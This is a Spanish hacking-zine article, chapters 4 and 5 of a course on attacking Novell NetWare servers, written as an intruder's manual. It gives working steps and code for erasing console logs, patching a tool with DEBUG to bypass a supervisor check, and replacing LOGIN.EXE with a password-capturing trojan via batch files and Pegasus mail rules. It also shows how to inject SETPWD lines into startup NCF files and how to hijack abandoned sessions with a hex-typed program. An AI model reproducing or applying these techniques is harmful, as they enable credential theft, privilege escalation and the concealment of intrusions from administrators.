-[ 0x0E ]-------------------------------------------------------------------- -[ CURSO DE NOVELL NETWARE -IV- Y -V- ]-------------------------------------- -[ by MadFran ]-------------------------------------------------------SET-16- Cuarto capitulo sobre Novell Netware Capitulo - 04 LA CONSOLA 04-1 Como evitar los registros de consola. Necesitamos acceso a la consola y privilegios de super. La red debe tener 3.11 o superior y que funcione CONLOG.NLM. Cualquier red en estas condiciones graba todos los mensajes en un archivo. Si lanzas SETPWD desde la consola, la respuesta se graba en el archivo log. Aqui estan los pasos para determinar si esta activada y como evitarlo. - Teclea MODULES en la consola, busca CONLOG.NLM, si lo encuentras.... esta activo. - Busca CONSOLE.LOG en SYS:ETC. Es un fichero de texto que se puede mirar pero no editar ni borrar si CONLOG esta activo. - Unload CONLOG en la consola. - Borra, o mejor edita CONSOLE.LOG, borrando tus rastros. - Carga CONLOG. Te dara un mensaje. - Lanza PURGE desde SYS:ETC para borrar viejas versiones de CONSOLE.LOG que tu editor puede haber dejado. 04-2 Se puede utilizar la password de RCONSOLE para que trabaje como Super ? Si y no. En version 3.x, la password del super siempre funciona. Un error frecuente acerca de la password del super en 3.x es utilizar un switch para que solo lo utilice la password del super. Funciona asi : LOAD REMOTE /P= en lugar de LOAD REMOTE RCONPASSWORD El admin piensa que /P= desconecta a cualquier menos a super para RCONSOLE. De hecho la password se queda en /P=, dejandote entrar. El segundo error mas frecuente es utilizar -S La version 4.1 es un poco diferente. Funciona de la forma siguiente : - En la consola teclea REMOTE SECRET, donde SECRET es la password de la consola. - Teclea REMOTE ENCRYPT. Te pedira una password para encriptar. - Esto te dara la version encriptada del password, y te dara la opcion de escribir LDREMOTE.NCF en el directorio SYS:SYSTEM, conteniendo todas las entradas que soportan la carga del Remote Console. - Se puede lanzar LDREMOTE a partir de tu AUTOEXEC.NCF, o puedes cambiar la linea LOAD REMOTE en AUTOEXEC.NCF de la forma siguiente: LOAD REMOTE SECRET se convierte en LOAD REMOTE -E 870B7E366363 Otra nota. Para asegurar que el password de super funcione con RCONSOLE (4.02 o superior), a¤ade el switch para ocultar -US LOAD REMOTE -E 870B7E366363 -US Otro switch no documentado es -NP, que significa sin password. 04-3 Como puede evitar el bloqueo de MONITOR Hay un camino facil y sencillo para hacerlo para hacerlo en 3.11 si tienes un servidor de impresion. He aqui la explotacion del bug en 3.11 - Utiliza PCONSOLE para parar el servidor de impresion. Esto provoca que la ventana del monitor vaya a la ventana de la impresion y espera el enter para salir de la ventana. PCONSOLE se lanza sin ninguna dificultad, pero una vez dentro no he encontrado ninguna opcion para parar el servidor. - Vete a la ventana de la consola y teclea UNLOAD MONITOR. - Mira en AUTOEXEC.NCF la linea PSERVER.NLM y manualmente vuelve a cargar PSERVER.NLM Tanto en 3.x como en 4.x, intenta los pasos de la seccion 02-6. Puedes probar cualquier password en la consola desbloqueada adema de desconectar la proteccion de password en 3.x Quinto capitulo sobre Novell Netware Capitulo - 05 ACCESOS A ARCHIVOS Y DIRECTORIOS 05-1 Como puedo ver archivos y directorios ocultos. En lugar del comando normal DIR, utiliza NDIR (facil, no?). NDIR *.* /S /H te permitira ver tambien los archivos de sistema. 05-2 Como puedo evitar el flag "execute-only" Si un archivo esta marcado como solo para ejecutar, todavia es posible abrirlo. Abre el archivo con un programa que lea ejecutables y grabalo en otro directorio. Tambien puedes probar X-AWAY.EXE para eliminar esta marca si el programa FLAG.EXE de Novell no puede hacerlo. Pero, de nuevo, X-AWAY.EXE solo funciona con privilegios de super. Para desactivar el chequeo de accesos de super en X-AWAY, intenta lo siguiente : REN X-AWAY.EXE WORK DEBUG WORK EB84 EB W Q REN WORK X-AWAY.EXE Listo ! Cualquiera puede copiar archivos de solo ejecucion. El unico problema es que necesitas practicamente derechos totales en el directorio donde residen los archivos. 05-3 Como ocultar nuestra presencia despues de alterar archivos El mejor metodo es usar Filer. Pasos a seguir para eliminar alteraciones de archivos. - Lanza Filer o utiliza NDIR y apunta los atributos del archivo objetivo, sobre todo la fecha y propietario del archivo. - Realiza los cambios en el archivo. - Lanza Filer o utliza NDIR para ver si los atributos han cambiado. Si es asi, vuelvelos a sus valores originales. Pulsando F1 en Filer, tendras toda la ayuda en linea que necesites, el camino mas rapido es lanzar Filer en el directorio donde esta el archivo, marcarlo y pulsar enter, seleccionando File Options y despues View/Set File Information. View y Edit y lo que desees. 05-4 Que es un troyano de Netware Un troyano de Netware es un programa que supuestamente hace una cosa pero realmente hace otra, y esto utilizando las utilidades API de Netware. Yo nunca me he encontrado personalmente uno, pero asi es como en teoria funcionan. - El troyano se coloca en una terminal a ser posible que utilice el administrador. El troyano se puede llamar algo parecido a CHKVOL.COM o VOLINFO.COM, que es un nombre real pero con extension COM. Se tiene que colocar en el path de la estacion de trabajo. - Cuando se ejecuta, el troyano utiliza las llamadas API para determinar si la persona conectada tiene derechos de super, si no es asi pasa a la siguiente tarea. En caso contrario se ejecuta alguna accion para romper la seguridad. - Despues se ejecuta CHKVOL.EXE o VOLINFO.EXE real como si nada. La rotura de la seguridad tipicamente lo hace algun tipo de actividad de comando en linea que deberia ejecutarse por las llamadas del sistema. Por ejemplo, PROP.EXE podria ejecutarse para construir una propiedad y reemplazar LOGIN.EXE copiandolo en el server en el directorio SYS:LOGIN. O RW que permite acceso al SYS:SYSTEM para no-super usuarios como si fuera GUEST. Una vez activado el troyano se puede borrar a si mismo. 05-5 Que son los Trustee Diretory Assignments. Lan God ha se¤alado que los Trustee Directory Assignements son los servicios peor entendidos y mal configurados de Novell Netware. Tipicamente un sitio seguro deberia tener Read y File Scan solo en pocos directorios, y no deberia tener ningun derecho en el directorio raiz de ningun directorio. Se pueden asignar derechos via el filtro Trustee Directory Assignements hacia abajo en el arbol del directorio, de forma que si un usuario tiene acceso de escritura en el directorio raiz, tambien tendra dichos derechos en todos los directorios que se encuentren debajo (a no ser que explicitamente se limite el derecho). Los derechos no estan localizados en el bindery, sino en cada volumen. A continuacion una breve descripcion de Trustees y Trustee Directory Assignements copiados de : COMP.OS.NETWARE.SECURITY, FAQ Un "Trustee" es cualquier usuario o grupo que tiene derechos de acceso en un directorio. Los derechos de acceso son ligeramente distintos en Netware 2 que en 3. S - Supervisor. Cualquier usuario con derechos de supervisor en un directorio tendra todos los demas derechos, esten o no explicitamente declarados. Las cuentas con derechos de Supervisor conservaran estos derechos en cualquier directorio. R - Leer. Da derechos de lectura de archivos. C - Crear. Permite crear archivos y directorios. A no ser que tenga derechos de escritura, no podra editar los archivos que han sido creados. W - Escribir. Permite al usuario hacer cambios en archivos. A no ser que tengan tambien derechos de creacion, no podras editarlos, ya que las operaciones de escritura solo pueden usarse para ampliar archivos (no truncarlos, cosa que hacen los editores normales). E - Borrar. Permite borrar y eliminar archivos. M - Modificar. Permite modificar atributos de archivos. F - Mirar. Permite al usuario ver informacion de archivos y directorios. Si un usuario no tiene derechos de mirar, no tendra evidencia alguna de la existencia de los archivos. A - Control de acceso. Permite al usuario cambiar los derechos. Le permitira dar accesos tipo A a otros, quitar derechos y revocar derechos especificos. El unico problema es que es incluso posible quitar derechos de si mismo, con lo cual,...los pierdes. Esto es como hacer el organigrama de tu empresa y.... no ponerte. 05-6 Explotacion de alguna asignacion de derechos Hay dos formas. En 3.x el grupo EVERYONE tiene derechos en SYS:MAIL. Esto significa que el usuario (incluso GUEST) puede escribir archivos en cualquier subdirectorio en SYS:MAIL. No es totalmente cierto. Puedes escribir en los directorios que tienes derechos. Estos varian en funcion de lusuario Las primeras versiones de Netware incluian un sencillo paquete de mail, y todo nuevo usuario tiene un subdirectorio en MAIL con derechos RRCWEMF, con su numero de identificacion. Un numero importante es el 1, que pertenece al supervisor. Aqui hay un sistema de explotarlo. TRUCO No 1 ---------- - Login como GUEST y cambia al directorio SYS:MAIL (En realidad cualquier directorio es bueno) - Teclea DIR. Veras un subdirectorio, este es el que pertenece a GUEST. Cambia a este subdirectorio (Por ejemplo C0003043) - Teclea DIR. Si no hay ningun archivo llamado LOGIN, puedes proseguir. Si hay algun archivo LOGIN, incluso vacio, no puedes hacerlo. - Copia la version itsme de PROP.EXE y LOGIN.EXE en el directorio SYS:MAIL\C0003043. - Crea un archivo batch (llamalo BOM.BAT) en este directorio, con el siguiente contenido. @ECHO OFF FLAG \LOGIN\LOGIN.EXE N > NUL *REM Cambia los atributos de LOGIN a Normal COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL FLAG \LOGIN\LOGIN.EXE SRO > NUL *REM Cambia a S (Compartible) RO (Solo Lectura) \MAIL\C0003043\PROP -C > NUL - Crea un archivo LOGIN.BAT con el contenido siguiente. MAP DISPLAY OFF MAP ERRORS OFF MAP G:=3DSYS: G: * REM En algun sistema DRIVE G: COMMAND /C #\MAIL\1\BOMB F: * REM En algun sistema DRIVE F: MAP DELETE G: - Ahora copia los archivos en el directorio del supervisor desde el drive mapeado al volumen SYS: TYPE BOMB.BAT > \MAIL\1\BOMB.BAT TYPE LOGIN > \MAIL\1\LOGIN Como no tengas derechos de supervisor, esto no hay quien lo haga La proxima vez que el supervisor se conecte el archivo LOGIN.EXE original es reemplazado y se ejecuta PROP.EXE, capturando passwords. Lanza PROP mas tarde para cosechar los passwords cazados. Tendras todos los passwords (incluidos los del supervisor). No te olvides de borrar los archivos LOGIN y BOMB.BAT. El administrador puede evitar esto creando login scripts personales o a¤adiendo un comando EXIT al final del System Login Scrip. Las ultimas versiones de Netware crean un archivo LOGIN vacio en los directorios SYS:MAIL. TRUCO No 2 ---------- Pegasus mail tiene un fallo que lo enlaza con los derechos de creacion en SYS:MAIL. He aqui como usarlo : - Creas un archivo RULES.PMQ que lanza un programa despues de recibir un mensaje mail. El programa es algo parecido a esto. COMMAND /C F:\MAIL\1\BOMB.BAT - Supongamos que tu directorio mail es SYS:MAIL\C0003043. Copia PROP.EXE y LOGIN.EXE (version istme) en este directorio. - Tu BOMB.BAT deberia ser algo asi. @ECHO OFF FLAG \LOGIN\LOGIN.EXE N > NUL COPY \MAIL\C0003043\LOGIN.EXE \LOGIN\LOGIN.EXE > NUL FLAG \LOGIN\LOGIN.EXE SRO > NUL \MAIL\C0003043\PROP -C > NUL - Cuando el super lea el mail, se activa LOGIN.EXE y empieza a capturar passwords. Despues de adquirir derechos super, borra los archivos de SYS:MAIL\1 Este truco solo funciona si RULES.PMQ no existe en el directorio destino. TRUCO #2a --------- Si RULES.PMQ existe, no puedes hacerlo, ya que solo puedes crear archivos nuevos en este directorio. Pero hay una posibilidad de que super lo haga por ti. - Crea extra reglas para Pegasus. Llamalas desde RULEA.PMQ hasta RULER.PMQ, y de RULET.PMQ hasta RULEZ.PMQ. - La proxima vez que super se conecte, le dara un error. - Intentara corregirlo borrando RULE?.PMQ,... y de paso borrara RULES.PMQ. - Ahora puedes ir al TRUCO 2. 05-7 Algunas reglas generales sobre derechos. Para ver tus derechos, utiliza el comando WHOAMI /R. A contimuacion un resumen de los derechos mas comunes y su proposito. Donde aparece x, significa que es igual la letra que aparece. [SRCWEMFA] Significa que tienes todos los derechos. [Sxxxxxxx] Solo aparece si eres supervisor o equivalente. Significa que tienes acceso pleno en este directorio y todos los subdirectorios. No puedes ser excluido de ningun subdirectorio aunque otro usuario explicitamente lo declare. [xxxxxxxA] Es lo mejor despues de super. Significa que tienes control en todos los directorios y subdirectorios. Te pueden revocar los derechos en un subdirectorio pero siempre los puedes recuperar mediante herencias. [_R____F_] Solo derechos de lectura. Tipico para directorios de software. [_RCWEMFx] Lo que normalmente se tiene en el directorio propio. Si encuentras algun directorio con estos derechos, se puede utilizar para archivar ficheros (y saltarte las limitaciones de espacio). [_RxW__Fx] Normalmente para archivos log. A no ser que tengas derechos C, no es posible editar los archivos en este directorio. El comando RIGHTS te dira los derechos que tienes en un directorio en particular. GRANT, REMOVE y REVOKE se utilizan para dar derechos. 05-8 Como puede ayudarte el acceso a los archivos NCF El acceso a algun fichero .NCF puede evitar la seguridad, ya que tradicionalmente estos archivos se lanzan desde la consola y se asume que hay seguridad de acceso a la consola. La adicion de algunas lineas a alguno de estos archivos te puede dar acceso al sistema. El mas vulnerable es el AUTOEXEC.NCF. A¤adir un par de lineas para lanzar BURGLAR.NLM o SETPWD.NLM te dara acceso sin duda. Pero recuerda que hay otros archivos que te pueden ayudar. Por ejemplo ASTART.NCF y ASTOP.NCF se usan para lanzar y parar Arcserve, el sistema mas popular de backup para Netware. El archivo LDREMOTE.NCF, mencionado en el capitulo 04-2 es otro objetivo potencial. Las lineas que puedes a¤adir a archivos como estos son : UNLOAD CONLOG LOAD SETPWD SUPERVISOR SECRET CLS LOAD CONLOG Se asume que tienes derechos de lectura y escritura en el sitio donde tienes los archivos NCF y puedes copiar SETPWD.NLM en el server. Ten presente que desmontando CONLOG solo cubriras tus trazas de forma parcial, en el archivo CONSOLE.LOG sera obvio que CONLOG ha sido montado y desmontado. El comando CLS es para borrar tus actividades de la pantalla de la consola. El mejor NCF para esto es obviamente uno que se utilice durante el arranque o durante operaciones automaticas. De esta forma un corto NCF y sus actividades escaparan a los ojos del administrador. 05-9 Puede alguien hacer logout y tu aprovecharse de ello ? Si, he aqui como. Teclea el siguiente comando directamente en el DOS. debug boo.com e100 eb 2b 80 fc d7 74 22 3d 02 f1 74 1d 3d 19 f2 74 e110 18 3d 17 f2 74 0a 3d 17 f2 74 05 ea 5b 46 4d 5d e120 50 b0 d2 38 45 02 58 75 f2 f8 ca 02 00 b4 49 8e e130 06 2c 00 cd 21 b8 21 35 cd 21 89 1e 1c 01 8c 06 e140 1e 01 b8 21 25 ba 02 01 cd 21 ba 2d 01 cd 27 00 rcx 50 w q Lanza esto en un terminal (Net 3.x o 2.x), y espera que alguien lo utilice y despues se desconecte y lo abandone,.....Ooops.. aparentemente ha olvidado hacer bien el logout. Moraleja : Si utilizas una red con terminales publicos, ademas de logout apaga el terminal al irte. 05-10 Otros programas que dan demasiados accesos Netware NFS tiene varios bugs (ver seccion 07-6), asi como IntraNetware (seccion 12) Para accesos remotos, los hackers siempre buscan un Shiva. Mira, si un hacker tiene el nombre de una cuenta, no le hace falta nombre de usuario ni password para conectarse. Si un usuario de Shiva desconecta sin hacer logout, la proxima persona que acceda tendra los derechos de la anterior. Shiva no desconecta correctamente la conexion. Shiva es un sistema multimodem muy comun para acceder telefonicamente a las empresas 05-11 Como puedo evitar los limites de espacio en disco Algunos administradores olvidan implementar restricciones en algunos volumenes, pero dan accesos de escritura a todos. Esto permite utilizar mas recursos de los previstos. Algunos sistemas mantienen directorios en un volumen, y solo aplican restricciones en este volumen. Aplicaciones y archivos de sistema se pueden colocar en otros volumenes. Ya que algunas aplicaciones requieren derechos de escritura en estos directorios, si no se limita el espacio, algunos usuarios capaces de lanzar el programa pueden utilizar el espacio disponible (Microsoft Mail y su volumen ..) Es el caso del SYS:MAIL\xxx.